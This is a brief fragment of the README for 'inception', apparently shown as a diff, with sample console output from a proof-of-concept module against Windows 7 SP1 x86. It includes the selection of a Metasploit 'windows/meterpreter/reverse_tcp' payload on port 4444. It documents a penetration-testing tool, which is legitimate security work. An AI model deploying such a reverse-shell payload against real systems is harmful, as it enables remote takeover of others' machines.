carmaa/inception/README.md

     [?]
 Will potentially write to file.
 OK? [y/N] y [!]
 This module currently only work as a proof-of-concept against Windows 7 SP1 x86.
 No other OSes, versions or architectures are supported, nor is there any guarantee that they will be supported in the future.
-If you want to change this, send me a wad of cash in unmarked dollar bills or a pull request on github.
     [?]
 What MSF payload do you want to use? windows/meterpreter/reverse_tcp [*] Selected options:
     [*] LPORT: 4444